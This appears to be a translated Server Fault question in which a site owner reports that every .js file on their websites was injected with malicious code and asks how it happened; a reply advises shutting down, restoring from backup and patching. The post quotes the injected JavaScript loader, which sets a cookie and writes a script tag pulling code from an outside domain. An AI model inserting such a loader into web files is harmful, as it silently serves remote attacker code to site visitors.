Hacking

通過在 .js 文件中插入程式碼來入侵網站

  • December 5, 2012

可能重複:

我的伺服器被黑了 緊急

似乎有人通過在所有 .js 文件中插入程式碼來入侵我擁有的一堆網站。

function g(){var r=new RegExp("(?:; )?1=([^;]*);?");return r.test(document.cookie)?true:false}var e=new Date();e.setTime(e.getTime()+(2592000000));
if(!g()&&window.navigator.cookieEnabled){document.cookie="1=1;expires="+e.toGMTString()+";path=/";document.write('<script src="http://mainscript.org/mainscript.js"></script>');}

我想知道他怎麼能做到這一點,因為我擁有伺服器並且我已經啟動了 mod_sec,許多功能被禁用並且我認為安全性非常好。

有小費嗎 ?想法?我只是想在這裡集思廣益。

最好的辦法是關閉網站。從備份恢復,然後修補伺服器/站點/軟體等。

引用自:https://serverfault.com/questions/455266